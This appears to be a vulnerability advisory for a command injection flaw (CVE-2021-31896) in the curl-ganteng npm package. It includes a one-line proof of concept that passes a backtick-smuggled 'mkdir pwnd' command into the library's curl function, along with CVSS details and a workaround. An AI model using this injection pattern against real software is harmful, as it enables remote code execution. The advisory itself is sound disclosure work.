Command Injection Vulnerability In Curl-Ganteng - CVE-2021-31896 / CX-2021-4779


Severity: 9.8 - Critical Severity

Advisory Timeline Summary
Affected versions of `curl-ganteng` npm package are vulnerable to command injection vulnerability in the `curl` function.


All versions of curl-ganteng npm package.


This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Steps To Reproduce

Run the following PoC:

var curl = require('curl-ganteng')
curl.curl("' `mkdir pwnd`'").catch((a) => {console.log(a)}).then((a) => {console.log(a)})

Expected Result:

A new folder named ‘pwnd’ will be created.


Currently there is no fix version released. As a workaround, avoid passing untrusted input into the vulnerable parameters when using the library.


Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: High

Integrity: High

Availability: High


This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.


  1. curl-gateng npm package